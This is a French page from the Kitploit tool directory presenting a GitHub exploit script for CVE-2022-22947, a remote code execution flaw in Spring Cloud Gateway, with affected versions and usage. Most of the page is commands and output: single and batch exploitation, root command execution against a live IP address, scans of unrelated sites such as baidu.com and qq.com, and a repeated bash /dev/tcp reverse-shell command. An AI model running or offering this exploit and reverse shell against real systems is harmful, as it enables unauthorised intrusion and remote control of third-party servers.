Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2022-22947_EXP — Un script qui peut être vérifié individuellement ou par lots, et peut également ouvrir un shell inversé | Kitploit
Outils/GitHubGitHub/anansec/cve-2022-22947_exp
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et Contrôle
GitHubanansec/cve-2022-22947_exp

CVE-2022-22947_EXP

Un script qui peut être vérifié individuellement ou par lots, et peut également ouvrir un shell inversé

Voir le dépôt
7137il y a 4 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

1. Vulnérabilité d'exécution de code à distance dans Spring Cloud Gateway

Niveau de danger : Élevé

Statut POC/EXP : Public

Numéro CNVD : CNNVD-2022-16402

Numéro CVE : CVE-2022-22947

2. Périmètre concerné :

    • VMWare Spring Cloud Gateway 3.1.0
    • VMWare Spring Cloud Gateway >=3.0.0, <=3.0.6
    • VMWare Spring Cloud Gateway <3.0.0

3. Description de la vulnérabilité

Spring Cloud Gateway présente une vulnérabilité d'exécution de code à distance. Cette vulnérabilité se produit au niveau du point d'extension Actuator des applications Spring Cloud Gateway, qui, lorsqu'il est activé, exposé et non sécurisé, est susceptible d'être attaqué par injection de code. Un attaquant peut exploiter cette vulnérabilité en créant malicieusement des requêtes permettant l'exécution de code arbitraire à distance sur l'hôte distant.

4. Utilisation de l'EXP CVE-2022-22947

4.1 Caractéristiques du script

  1. Prise en charge de la vérification d'une cible unique
  2. Prise en charge de la vérification par lots de vulnérabilités
  • Prise en charge du reverse shell
  • 4.2 Paramètres du script

    root@kitploit:~
    -h   Afficher l'aide
    -u   Spécifier l'URL cible
    -c   Spécifier la commande à exécuter (par défaut : id)
    -f   Spécifier un fichier contenant les URL cibles
    

    4.3 Utilisation du script

    1. Vérification d'une cible unique

    Méthode 1 :

    root@kitploit:~
    E:\pocs>python cve-2022-22947.py
    
        验证单个目标:
                1、python cve-2022-22947.py  进入交互模式后,根据提示输入目标url和需要执行的命令,注意命令的正确性
                2、python cve-2022-22947.py  -u http://example.com -c whoami
            验证多个目标
                1、python cve-2022-22947.py -f url.txt ,将需要验证的目标全部放在url目录下
            反弹shell
                1、python cve-2022-22947.py  -u http://example.com -c "bash -i >& /dev/tcp/ip/port 0>&1"
                2、进入交互模式,输入目标和反弹shell的命令
    
    请输入一个目标url地址:http://123.58.236.76:8484
    请输入想要执行的命令,默认执行id:whoami
    [+]目标:http://123.58.236.76:8484 ,成功获取回显命令:['root\\n']
    

    Méthode 2 :

    root@kitploit:~
    E:\learn\python\pocs\pocs>python cve-2022-22947.py -u http://123.58.236.76:8484 -c whoami
    
        验证单个目标:
                1、python cve-2022-22947.py  进入交互模式后,根据提示输入目标url和需要执行的命令,注意命令的正确性
                2、python cve-2022-22947.py  -u http://example.com -c whoami
            验证多个目标
                1、python cve-2022-22947.py -f url.txt ,将需要验证的目标全部放在url目录下
            反弹shell
                1、python cve-2022-22947.py  -u http://example.com -c "bash -i >& /dev/tcp/ip/port 0>&1"
                2、进入交互模式,输入目标和反弹shell的命令
    
    [+]目标:http://123.58.236.76:8484 ,成功获取回显命令:['root\\n']
    

    2. Vérification par lots

    root@kitploit:~
    E:\learn\python\pocs\pocs>python cve-2022-22947.py -f url.txt
    
        验证单个目标:
                1、python cve-2022-22947.py  进入交互模式后,根据提示输入目标url和需要执行的命令,注意命令的正确性
                2、python cve-2022-22947.py  -u http://example.com -c whoami
            验证多个目标
                1、python cve-2022-22947.py -f url.txt ,将需要验证的目标全部放在url目录下
            反弹shell
                1、python cve-2022-22947.py  -u http://example.com -c "bash -i >& /dev/tcp/ip/port 0>&1"
                2、进入交互模式,输入目标和反弹shell的命令
    
    [+]目标:http://123.58.236.76:8484 ,成功获取回显命令:['uid=0(root']
    [+]目标:http://123.58.236.76:8484 ,成功获取回显命令:['uid=0(root']
    [+]目标:http://123.58.236.76:8484 ,成功获取回显命令:['uid=0(root']
    [-]目标:http://www.baidu.com,漏洞验证失败,请手动验证!
    [-]目标:http://www.qq.com,漏洞验证失败,请手动验证!
    [+]目标:http://123.58.236.76:8484 ,成功获取回显命令:['uid=0(root']
    

    3. Reverse shell

    root@kitploit:~
    python cve-2022-22947.py -u http://123.58.236.76:8484 -c "bash -i >& /dev/tcp/xxx.xxx.xxx/65534 0>&1"
    

    image-20220519233354807

    image-20220519233429912

    Télécharger l’outil